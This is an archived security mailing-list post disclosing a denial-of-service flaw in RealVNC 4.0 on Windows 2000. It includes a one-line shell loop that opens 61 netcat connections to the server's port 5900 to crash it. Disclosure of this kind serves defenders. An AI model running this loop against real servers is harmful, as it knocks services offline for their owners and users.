lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY1-F245s5rQdHvl5D0000df85@hotmail.com> From: bugfree18 at hotmail.com (bug free) Subject: RealVNC 4.0 DoS It will cause RealVNC 4.0 server DoS when there are more than 60 connections. This has been test against VNC server on win2k. I test it from linux using the following: for i in `seq 1 61` do nc <vnc_server_ip> 5900 & done Thanks bugfree